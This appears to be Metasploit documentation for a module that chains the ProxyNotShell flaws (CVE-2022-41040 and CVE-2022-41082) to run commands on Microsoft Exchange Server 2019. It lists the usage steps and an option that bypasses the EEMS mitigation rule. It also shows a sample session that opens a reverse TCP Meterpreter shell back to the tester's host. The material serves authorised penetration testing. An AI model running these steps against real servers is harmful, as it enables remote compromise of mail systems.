documentation/modules/exploit/windows/http/exchange_proxynotshell_rce.md
This module chains two vulnerabilities on Microsoft Exchange Server that, when combined, allow an authenticated attacker to interact with the Exchange Powershell backend (CVE-2022-41040), where a deserialization flaw can be leveraged to obtain code execution (CVE-2022-41082). This exploit only support Exchange Server 2019.
By taking advantage of this vulnerability, you can execute arbitrary commands on the remote Microsoft Exchange Server.
This vulnerability affects:
use exploit/windows/http/exchange_proxynotshell_rceset RHOSTS [IP]set USERNAME [USERNAME]set PASSWORD [PASSWORD]runTechnique to bypass the EEMS rule.
none -- Make no attempt to bypass the EEMS rule. This can be used with the check method to determine if the EEMS
M1 rule is applied.
IBM037v1 -- Use IBM037 encoding combined with the X-Up-Devcap-Post-Charset header and UP User-Agent prefix. See
ProxyNotRelay for more information.
The maximum number of times to retry for targeting the backend server with the SSRF. This is useful in environments where a Data Availability Group (DAG) is in place and causes requests to be sent to a random backend server.
msf exploit(windows/http/exchange_proxynotshell_rce) > set RHOSTS 192.168.159.11
RHOSTS => 192.168.159.11
msf exploit(windows/http/exchange_proxynotshell_rce) > set USERNAME aliddle
USERNAME => aliddle
msf exploit(windows/http/exchange_proxynotshell_rce) > set PASSWORD Password1!
PASSWORD => Password1!
msf exploit(windows/http/exchange_proxynotshell_rce) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Sending stage (175686 bytes) to 192.168.159.11
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.11:7290) at 2022-11-18 17:32:18 -0500
meterpreter >